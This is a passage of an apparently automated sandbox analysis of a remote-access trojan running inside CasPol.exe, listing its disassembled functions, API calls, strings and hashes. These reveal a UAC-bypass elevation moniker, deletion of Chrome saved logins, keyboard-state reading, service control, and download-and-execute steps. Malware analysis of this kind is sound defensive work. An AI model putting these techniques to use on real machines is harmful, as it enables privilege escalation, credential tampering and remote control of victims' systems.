                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                            • String ID: 8[G
                                                                                                            • API String ID: 1888522110-1691237782
                                                                                                            • Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                            • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                            • Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
                                                                                                            • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                            Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object_wcslen
                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 240030777-3166923314
                                                                                                            • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                            • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                            • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                            Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3587775597-0
                                                                                                            • Opcode ID: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                            • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                            • Opcode Fuzzy Hash: 7cf647704d9da6e3b27b6f932af26f9fb806ddb2be27768a2356daea2e115d5b
                                                                                                            • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                            Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                            • String ID: <D$<D$<D
                                                                                                            • API String ID: 745075371-3495170934
                                                                                                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                            • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                            Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2341273852-0
                                                                                                            • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                            • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                            • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                            Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                            • API String ID: 341183262-3780268858
                                                                                                            • Opcode ID: 9a31d415458206e67b297c0ff902da26bb3864af038d5449f870ad87d369b2bb
                                                                                                            • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                            • Opcode Fuzzy Hash: 9a31d415458206e67b297c0ff902da26bb3864af038d5449f870ad87d369b2bb
                                                                                                            • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                            Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                            • API String ID: 2127411465-314212984
                                                                                                            • Opcode ID: f2af4c8a421ea6e9398857963b38f1f03d8e92c9919f27f2726a183544e4bb33
                                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                            • Opcode Fuzzy Hash: f2af4c8a421ea6e9398857963b38f1f03d8e92c9919f27f2726a183544e4bb33
                                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                            Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                            Strings
                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                            • Opcode ID: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                            • Opcode Fuzzy Hash: a2128c42762ca10650babd8ab1cfb8cacd5f3b7577b82760db2916a4dab099ee
                                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                            Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                            Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4043647387-0
                                                                                                            • Opcode ID: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                            • Opcode Fuzzy Hash: e6d26fc3e43131747f23564c7bb6c2c23fda576562a32a53d96f0f7b65159877
                                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                            Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                            • String ID:
                                                                                                            • API String ID: 276877138-0
                                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                            Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                            • Opcode ID: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                            • Opcode Fuzzy Hash: 7adedae087191cdbb87074b96bc09b469b6d5cbd4a3edd008392af3fdf127515
                                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                            Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: ACP$OCP
                                                                                                            • API String ID: 2299586839-711371036
                                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                            Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                            • String ID: SETTINGS
                                                                                                            • API String ID: 3473537107-594951305
                                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                            Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1157919129-0
                                                                                                            • Opcode ID: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                            • Opcode Fuzzy Hash: 6a2d412744edee45f0d860d0441e360fba5e5849462073823f699ecb6cc56ff2
                                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                            Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                            • String ID:
                                                                                                            • API String ID: 1286116820-0
                                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                            Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                            • API String ID: 2825088817-4197237851
                                                                                                            • Opcode ID: 190d0d5880912c748d84d3d347c9a8ce390a90ac63867873210681a88adea277
                                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                            • Opcode Fuzzy Hash: 190d0d5880912c748d84d3d347c9a8ce390a90ac63867873210681a88adea277
                                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
